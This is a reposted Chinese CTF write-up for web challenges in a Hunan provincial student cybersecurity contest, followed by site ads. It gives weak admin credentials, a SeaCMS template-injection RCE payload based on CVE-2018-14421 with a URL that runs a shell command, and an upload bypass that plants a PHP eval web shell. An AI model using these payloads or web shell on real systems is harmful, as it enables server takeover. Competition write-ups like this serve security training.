湖南省第二届大学生网络安全技能竞赛初赛实践重赛-Web

栏目: 服务器 · Apache · 发布时间: 5年前

内容简介:有登陆功能但是没有注册功能,所以要么sqli要么爆破密码,最终爆破得到弱口令进入后台。Backup有提示源码文件和flag文件在服务器上的位置审计源码,发现其实是CVE-2018-14421的简化版本,使用如下payload来构成rce

有登陆功能但是没有注册功能,所以要么sqli要么爆破密码,最终爆破得到弱口令进入后台。

admin
admin123

Backup有提示源码文件和flag文件在服务器上的位置

审计源码,发现其实是CVE-2018-14421的简化版本,使用如下payload来构成rce

zeroyu
{if:1)$GLOBALS['_G'.'ET'][zeroyu]($GLOBALS['_G'.'ET'][cool]);die();//}{end if}

注意一点这个id的值是要看响应包的。

http://101.71.29.5:10039//web/index.php?r=content%2Fshow&id=8&zeroyu=system&cool=cat%20/tmp/flag

最后读取flag

flag{65bb1dd503d2a682b47fde40571598f4}

参考

1.这篇文章是从payload出发来分析触发点的,很具有借鉴意义–>

CVE-2018-14421——Seacms后台getshell分析

文章中提到一点

htm文件在开发中就只是模板文件,需要有控制器来渲染,渲染一般都是有include,render,render_template等等代码关键词,所以我们可以通过这个来确定控制器。

2. seacms v6.61 审计深入思考

0x02 upload

题目描述:

http://101.71.29.5:10031/index.php

题目分析:

1.上传 php 文件–>上传失败并提示It is not a image

2.burp抓包并修改Content-Type: image/jpeg和文件后缀名–>依旧上传失败

3.猜测可能是判断了文件的格式,比如文件头什么的,所以我在图片里藏了一段PHP代码进行上传–>成功上传,但是无法解析

4.目标是Apache机器,进而构造 mu.jpg.php 后缀名进行上传–>上传成功并且成功解析

<?php @eval($_POST['pass']) ?>

湖南省第二届大学生网络安全技能竞赛初赛实践重赛-Web

5.使用cknife进行连接并找到flag

湖南省第二届大学生网络安全技能竞赛初赛实践重赛-Web

以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持 码农网

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

未来简史

未来简史

[以色列] 尤瓦尔·赫拉利 / 林俊宏 / 中信出版集团 / 2017-2 / 68.00元

进入21世纪后,曾经长期威胁人类生存、发展的瘟疫、饥荒和战争已经被攻克,智人面临着新的待办议题:永生不老、幸福快乐和成为具有“神性”的人类。在解决这些新问题的过程中,科学技术的发展将颠覆我们很多当下认为无需佐证的“常识”,比如人文主义所推崇的自由意志将面临严峻挑战,机器将会代替人类做出更明智的选择。 更重要的,当以大数据、人工智能为代表的科学技术发展的日益成熟,人类将面临着从进化到智人以来z......一起来看看 《未来简史》 这本书的介绍吧!

JSON 在线解析
JSON 在线解析

在线 JSON 格式化工具

在线进制转换器
在线进制转换器

各进制数互转换器

图片转BASE64编码
图片转BASE64编码

在线图片转Base64编码工具